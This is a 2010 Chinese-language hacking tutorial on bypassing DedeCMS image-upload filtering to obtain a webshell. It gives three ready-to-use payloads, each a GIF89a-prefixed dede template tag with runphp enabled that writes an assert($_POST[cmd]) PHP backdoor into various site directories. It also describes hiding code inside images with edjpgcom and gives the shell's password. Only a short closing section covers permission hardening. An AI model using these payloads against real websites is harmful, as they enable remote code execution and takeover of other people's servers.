突破最新版dede图片上传过滤拿shell技巧
时间:2010-11-25 来源:udb311
1、图片过滤//加强上传过滤
官方最新补丁:http://bbs.dedecms.com/232740.html
突破方法:使用edjpgcom把正常图片合成执行代码,添加到图片中。
已合成图片木马:生成在网站根目录文件名inc.php 密码xss
以上图片另存为,使用C32打开效果如下:2、目录无法写入:当碰到目录无法写入或者无脚本执行权限时可以试试!
利用plus/views.php页面执行时,默认生成目录是plus下。
如执行代码1:生成当前目录inc.php
gif89a{dede:name runphp='yes'}
$fp = @fopen("inc.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'assert($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
切换目录:
执行代码2:生成上级目录(即网站根目录)
gif89a{dede:name runphp='yes'}
$fp = @fopen("./../inc.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'assert($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
执行代码3:生成date(date、uploads必须可写入目录)
gif89a{dede:name runphp='yes'}
$fp = @fopen("./../date/inc.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'assert($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
DEDE安全加固设置:
1、wwwroot给予IIS读取权限;
2、网站根目录index.html文件给予读取、写入权限
3、date、uploads给予读取、写入权限,并除去脚本执行权限。
4、对生成html目录给予读取、写入权限,并除去脚本执行权限。
以上设置可以增加安全性,对程序使用没有任何影响。
by:黑白前线 过客
2010-11-25
标签分类: 脚本渗透